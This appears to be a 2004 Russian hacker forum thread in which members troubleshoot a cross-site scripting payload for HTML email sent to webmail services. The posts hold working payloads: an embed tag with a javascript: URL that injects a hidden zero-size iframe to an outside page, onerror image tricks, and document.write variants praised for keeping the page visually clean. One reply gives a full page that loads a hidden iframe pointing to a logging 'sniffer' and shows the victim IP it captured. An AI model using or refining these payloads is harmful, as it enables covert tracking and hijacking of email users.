про статью на сайте

Discussion in 'Уязвимости Mail-сервисов' started by Guest, 21 Jul 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'>
    тока нихрена не работает &nbsp;[​IMG]
     
  2. .:xz:.

    .:xz:. New Member

    Joined:
    21 Jul 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    зы если туда отправить просто линк и понему сходить,всё ок
     
  3. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Ну так выясни почему не работает...
    Отошли письмо сам себе, размерись со скриптом...
    Разводить руками и говорить не работает все могут..
    (а скрипт в принципе работоспособный, сам проверял)
     
  4. mexcrack

    mexcrack Banned

    Joined:
    29 Jun 2004
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Еще один вопрос про эту же статью.... в таблице на против Яндекса в колонке JS указано Onerror и Onload... что это хоть такое то? [​IMG] &nbsp;Да, а правее написано, что это дает удаление сайта *.narod.ru, а почтовый ящик взломать нельзя? [​IMG]
     
  5. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    onerror и onload это события, возникающие при ошибке или при загрузке чего-либо.
    В статье подразмеваются конструкции типа &lt;img src=&quot;http://noname.net/pupkin.jpg&quot; onerror=alert()&gt;
    Когда страница пытается загрузить несуществующую картинку, возникает ошибка, и выполняется скрипт, указанный в обработчике onerror.
    Под www.yandex.ru подразуемевается сайт бесплатного хостинга narod.yandex.ru, а не почтовый сервис.
     
  6. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    2 mexcrack
    если сделаешь все как я скажу будешь все намного лучше понимать:

    скачать HomeSite 5.5
    изучить HTML
    изучить CSS
    изучить JS
    понять DOM
    купить MSDN
    установить Apache
    изучить PHP/Perl
    изучить MySQL

    [​IMG]
     
  7. Eldar

    Eldar New Member

    Joined:
    19 Jul 2004
    Messages:
    14
    Likes Received:
    0
    Reputations:
    1
    2 zFailure

    Думаю что первые четыре пункта ему хватят, для того чтобы понять что такое обработчики событий onError onLoad...
     
  8. mexcrack

    mexcrack Banned

    Joined:
    29 Jun 2004
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    2 zFailure
    Ух ты, хорошая идея... спасиба за совет... [​IMG]
    2 Algol
    Ну что ж, попробуим... [​IMG]
     
  9. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    кстати у меня еще хобби есть: я постоянно с инета скачиваю документацию по программированию (щас уже 2ой cd копится)

    всем советю делать тоже самое
     
  10. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (zFailure @ июля 29 2004,07:47)</td></tr><tr><td id="QUOTE">кстати у меня еще хобби есть: я постоянно с инета скачиваю документацию по программированию (щас уже 2ой cd копится)

    всем советю делать тоже самое[/QUOTE]<span id='postcolor'>
    Жаль только прочитать удается 1% из скаченного)
     
  11. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 21 2004,15:19)</td></tr><tr><td id="QUOTE">я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'>
    тока нихрена не работает  [​IMG][/QUOTE]<span id='postcolor'>
    Ну во-первых у тебя &lt;iframe&gt; не заменен спец.символами. Поэтому он будет смотерться как &lt;xiframe&gt;.
    Во-вторых getElementById объект DOM поддерживается ТОЧНО, только IE, насчет NN не знаю. А вот знаю что не поддерживается Оперой(хотя, бывают новые версии)). Для оперы можно сделать document.write, но тогда вся конспирация летит к чертям)
     
  12. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    как насчет такого
    document.write(document.body.innerHTML+'&lt;'+'script'+'&gt;alert();&lt;'+'/script'+'&gt;');

    здесь и document.write и сохраняем конспирацию
     
  13. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    zFailure
    Все равно ты используешь код, который не поддерживается Оперой. По поаводу document.write имелось ввиду следующее:
    document.write('&lt;iframe&gt;&lt;/iframe&gt;&#39[​IMG];
    тогда будет срабатывать на люой платформе, но при открытии письма - визуально чистая страница
     
  14. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1251">
    <title>Untitled</title>
    </head>

    <body onLoad="document.write(document.body.innerHTML+'<iframe src=http://antichat.ru/cgi-bin/s.jpg?test width=0 height=0 style=display:none;></iframe>')">

    1234567890

    </body>
    </html>[/QUOTE]<span id='postcolor'>

    этот код был вызван мною в Opera 7.53

    в итоге
    [Mon Aug  2 12:53:46 2004] IP=XXX.XXX.XXX.XXX REFERER= QUERY=test
     
  15. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    zFailure... и то верно. весьма и весьма.. хехе)
    Кстати, навскидку, так, не знаешь, &lt;iframe&gt; сейчас поддерживается nentscape'ом? не наду дистрибов что-то пока..
    В скором времени отпишу сюда ещще кое-что, давольно интересная тема недавно была)